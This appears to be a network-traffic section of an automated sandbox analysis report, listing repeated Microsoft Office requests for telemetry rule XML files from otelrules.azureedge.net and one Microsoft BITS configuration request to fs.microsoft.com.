                          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
